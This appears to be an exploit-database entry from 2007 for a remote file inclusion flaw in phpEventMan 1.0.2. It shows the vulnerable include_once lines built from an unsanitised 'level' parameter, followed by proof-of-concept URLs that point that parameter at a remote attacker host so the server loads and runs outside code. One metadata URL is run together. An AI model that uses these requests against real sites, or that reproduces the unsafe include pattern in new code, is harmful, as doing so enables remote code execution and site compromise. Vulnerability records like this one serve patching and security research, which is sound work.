phpEventMan 1.0.2 - 'level' Remote File Inclusion

Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2007-01-31 
date_updated: 2016-09-27 
verified: 1 
codes: OSVDB-31937;CVE-2007-0702;OSVDB-31936 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpEventMan-1.0.2.zip

-----------------------------------------------

phpEventMan v1.0.2 (level) Remote File Include Exploit

-----------------------------------------------

Author: Cyber-Security

cyber-security.org

-----------------------------------------------

Code:

include_once($level."UserMan/controller/common.function.php");
include_once($level."Shared/sharedfunctions.php");

-----------------------------------------------

POC:

www.target.com/script_pat/Shared/controller/text.ctrl.php?level=http://evilscripts ?
www.target.com/script_pat/UserMan/controller/common.function.php?level=http://evilscripts ?

-----------------------------------------------

download: http://sourceforge.net/project/showfiles.php?group_id=169887
-----------------------------------------------

Reference: http://www.cyber-security.org/DataDetayAll.asp?Data_id=594

# milw0rm.com [2007-02-01]